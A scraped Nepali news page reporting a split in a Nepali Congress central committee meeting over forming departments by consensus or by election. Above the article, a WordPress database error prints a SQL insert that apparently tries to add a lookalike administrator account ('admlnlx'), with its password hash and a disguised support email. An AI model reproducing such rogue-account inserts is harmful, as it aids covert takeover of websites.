WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdbIWAmhJ6O.V5z0mH2zH7GU3OwP1s/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 19:54:07', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १३ साउन, काठमाण्डौ । नेपाली काँग्रेस केन्द्रीय समितिको बैठकमा विभाग गठन सम्बन्धमा दुई खेमाको मत बाझिएको छ । केन्द्रीय कार्यसमितिको आइतबारको बैठकमा बोल्ने केन्द्रीय सदस्यहरूले विभाग गठन सम्बन्धमा विधानले गरेको व्यवस्थालाई आआफ्नै अनुकूल व्याख्या गरेका छन् ।
ललितपुरको सानेपास्थित केन्द्रीय कार्यालयमा सभापति शेरबहादुर देउवाको अध्यक्षतामा बसेको बैठकमा पूर्वमहामन्त्री प्रकाशमान सिंहले सहमति नभए निर्वाचन गरेरै स्थानीयदेखि प्रदेश समितिको टुङ्गो लगाउन जोड दिनुभयो ।
नेता सिंहकै धारणामा सहमति जनाउनुहुँदै अर्का केन्द्रीय सदस्य बलबहादुर केसीले चुनावी प्रक्रियाबाटै समितिहरू गठन हुनुपर्नेमा जोड दिनुभयो । यसअघि मन्तव्य राख्नुभएका संस्थापन पक्षधर केन्द्रीय सदस्यहरुले भने सहमतिमै स्थानीयदेखि विभागको टुङ्गो लगाउनुपर्ने बताउँदै आएका छन् । गोरखापत्र दैनिक